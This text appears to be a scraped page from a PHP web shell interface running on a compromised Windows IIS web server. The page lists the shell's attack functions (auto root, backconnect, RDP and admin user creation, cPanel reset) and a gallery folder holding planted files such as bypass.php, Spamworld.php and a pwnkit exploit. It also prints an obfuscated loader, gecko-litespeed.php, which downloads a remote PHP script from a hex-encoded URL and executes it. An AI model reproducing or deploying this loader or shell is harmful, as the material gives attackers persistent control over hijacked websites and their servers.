Windows NT VMI608383 10.0 build 17763 (Windows Server 2019) AMD64
Microsoft-IIS/10.0
: 144.126.137.138 | : 216.73.216.113
Cant Read [ /etc/named.conf ]
8.1.33
IWPD_484(vsec.in_n1)
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
C: /
Inetpub /
vhosts /
vsec.in /
httpdocs /
Admin /
Images /
MasterGallery /
[ HOME SHELL ]
Name
Size
Permission
Action
.mad-root
0
B
-rw-rw-rw-
(1069)-1.JPG
3.84
MB
-rw-rw-rw-
(1697)-3.JPG
1.89
MB
-rw-rw-rw-
000_0055.JPG
2.3
MB
-rw-rw-rw-
000_0084.JPG
2.01
MB
-rw-rw-rw-
000_0128.JPG
1.8
MB
-rw-rw-rw-
0N9A6193.JPG
1.25
MB
-rw-rw-rw-
2022-23 (4).jpeg
245.49
KB
-rw-rw-rw-
25 year of service.JPG
1.92
MB
-rw-rw-rw-
ALLfuckedrendia.pHp
68.87
KB
-rw-rw-rw-
Blood donation camp.JPG
663.22
KB
-rw-rw-rw-
Chief MInister Relief Fund.JPG
1.43
MB
-rw-rw-rw-
DSC_0912.JPG
669.62
KB
-rw-rw-rw-
IMG_4956.JPG
1.45
MB
-rw-rw-rw-
IMG_4957.JPG
1.46
MB
-rw-rw-rw-
IMG_4958.JPG
1.12
MB
-rw-rw-rw-
Spamworld.php
24.13
KB
-rw-rw-rw-
Yoga.jpeg
344.17
KB
-rw-rw-rw-
adminer.php
465.43
KB
-rw-rw-rw-
aishwarya rai.jpg
5.09
KB
-rw-rw-rw-
bypass.php
8.16
KB
-rw-rw-rw-
children day 3.JPG
983.67
KB
-rw-rw-rw-
f.php
114.68
KB
-rw-rw-rw-
fuckedMf.PhP
3.3
KB
-rw-rw-rw-
gecko-litespeed.php
499
B
-r--r--r--
pwnkit
10.99
KB
-rw-rw-rw-
test.txt
4
B
-rw-rw-rw-
user_1.jpg
8.54
KB
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : gecko-litespeed.php
<?php goto sHNkh; sHNkh: $EnoeA = tmpfile(); goto uTcE6; uTcE6: $UmXGi = fwrite($EnoeA, file_get_contents("\x68\164\x74\x70\163\72\x2f\57\x72\141\x77\x2e\x67\151\164\150\x75\x62\165\x73\x65\162\143\x6f\x6e\x74\x65\x6e\164\x2e\x63\x6f\155\x2f\115\x61\x64\105\170\160\x6c\157\151\x74\x73\x2f\x47\145\x63\153\157\x2f\155\x61\x69\x6e\x2f\x67\145\143\x6b\x6f\x2d\x6e\145\x77\x2e\160\150\160")); goto xa01q; xa01q: include stream_get_meta_data($EnoeA)["\165\x72\x69"]; goto Lg1o1; Lg1o1: fclose($EnoeA);
Close